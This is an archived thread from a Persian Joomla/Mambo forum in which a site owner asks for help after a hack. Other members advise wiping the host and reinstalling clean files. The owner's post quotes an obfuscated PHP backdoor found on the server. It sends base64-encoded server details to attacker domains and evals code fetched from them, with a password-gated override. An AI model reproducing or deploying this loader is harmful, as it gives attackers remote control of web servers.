احتمالا هکیده شدم [بایگانی] - انجمن جوملا فارسی

PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : احتمالا هکیده شدم

ninjavo

12-11-2008, 07:47 AM

سلام
خسته نباشید
من چند وقت پیش روی یکی از سرورهای ایرانی بودم و زندگی خوبی داشتم و خوشبخت بودم که ناگهان در یک آن واحد هم سایت ارور داد هم انجمن که ما به سرور گفتیم و اونا گفتن غیر ممکنه و ....
حالا از اون سرور اومدم روی مامبو سرور
فقط این هکر هر جا رسیده یه فایل .htacces ساخته به اضافه یه فایل php که همیشه اسم فایلهاش 12658.php
یا یه سری اعداد هست
که من هرچی اینا رو پاک میکنم بازم هست
حالا یه سوال دارم
چیکار کنم و بگید که کجاها باید فایل htaccess باشه ؟
ممنون

مهدی.

12-11-2008, 08:12 AM

سلام
شما چه كامپوننتهايي و چه ماژولهايي و مامبوتهايي در مامبو خودت نصب داري؟
قالب سايتت رو داري ؟
آيا تغييري در فايلهاي اصلي مامبو دادي؟

اين دوتا سوال رو جواب بده تا بگم دقيقاً چيكار كني.

كامروا باشيد.

dj_ahmad

12-11-2008, 09:07 AM

میشه محتویات او دوتا فایل که فرمودید رو بزارید تا ببینیم؟!!

ninjavo

12-11-2008, 10:35 AM

کامپوننت داتسو-ریموسیتوری - تبلیغات-مراجعات
بله دارم
شاید دادم یادم نیست.

کد یکی از این فایلها به قرار زیر هست :

<? error_reporting(0);$a=(isset($_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند])?$_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند]:$فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند])?$_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند]:$فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند);$g=(isset($_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند])?$_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند]:$فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند])?$_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند]:$فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند);$z="/?".base64_encode($a).".".base64_encode($b).".".bas e64_encode($c).".".base64_encode($d).".".base64_en code($e).".".base64_encode($f).".".base64_encode($ g).".".base64_encode($h).".e.".base64_encode($i)." .".base64_encode($j);$f=base64_decode("cGhwc2VhcmN oLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="d739bd1d01fff9d378253001215c277a") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f. $z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzc u").$f.$z))eval($c);else{$cu=curl_init(base64_deco de("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURL OPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close ($cu);eval($o);}; error_reporting(0);$a=(isset($_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند]) ? $_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند] : $فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند]) ? $_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند] : $فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند]) ? $_SERVER["فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند] : $فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند); $str=base64_encode($a).".".base64_encode($b).".".b ase64_encode($c).".".base64_encode($g).".".base64_ encode($h).".".base64_encode($n);if((include_once( base64_decode("aHR0cDovLw==")."bagdizzazbzhcczb".b ase64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."bagdi zzazbzhcczb".base64_decode("LnVzZXJzLnBocGluY2x1ZG UucnU=")."/?".$str);}?>

این فایلهای htacces رو چیکار کنم که همه جا هست ؟

dj_ahmad

12-11-2008, 04:41 PM

آقا اگه همه سورست رو یه جا منتقل کردی رو هاست جدید من اکیدا پیشنهاد میکنم که هاستت رو آب بکشی.یعنی کامل پاک کن و از اول سورس ها رو جایگزین کن.

مهدی.

12-11-2008, 04:53 PM

سلام - بله كاملاً حق با ياشار عزيز هستش.

در فايلهاي php شما كارهايي انجام شده كه هكر بعداً ميتونه با استفاده از اونا به سرور شما متصل بشه و مشكلاتي رو براتون ايجاد كنه.
الان فايلهاي شما و شايد ديتابيس شما نيز آلوده باشن كه بهتره همه چيز رو نو بريزيد.

شما يكاري بكنيد و اينكارايي كه ميگم رو با دقت انجام بديد.
1 : از سايت فعلي خودتون بكاپ كامل بگيريد.
2 : فايلهاي موجود در هاست رو كاملاً پاك كنيد.
3 : از يك بسته آماده مامبو (هم ورژن مامبو فعلي) استفاده كنيد و تمامي فايلها را در هاست بريزيد.
4 : يك ديتابيس جديد ايجاد كنيد.
5 : مامبو رو نصب كنيد در ديتابيس جديد خودتون
6 : تمامي كامپوننتها و ماژولها و مامبوتها و قالب خودتون رو كه قبلاً در سايت نصب كرديد رو در مامبو جديد نيز نصب كنيد. (دقيقاً همون نسخه ها باشن كه در ديتابيس مشكلي پيش نياد)
7 : حالا كه مطمئنيد تمامي فايلهاي موجود سالم هستن بريد و به همان ديتابيس قبلي، مامبو رو متصل كنيد. (از طريق configuration.php)

البته ممكن هستش كه در ديتابيس شما هم نيز تغييراتي ايجاد كرده باشن كه بهتره اون رو هم بشينيد و كامل مشاهده كنيد كه مشكلي نداشته باشه.

در صورت اينكه ميتونيد اصلاً از اين سايت بگذريد ؛ و يا فقط از جداول اصلي ديتابيس قبلي خودتون استفاده كنيد و به سايت جديد منتقل كنيد.

اگر درك هريك از مسائل مطرح شده براتون سخته بفرماييد تا دقيقتر توضيح بدم. (دقيق بگو كه كجاش برات مشكله)

اگر هم نميتوني كه هيچي اگر خواستي من ميتونم برات رديف كنم ولي هيچ مسئوليتي بعدش نخواهم داشت. (فقط تا فردا من هستم اگر نميتوني بگو من همين امشب رديف كنم)

كامروا باشيد.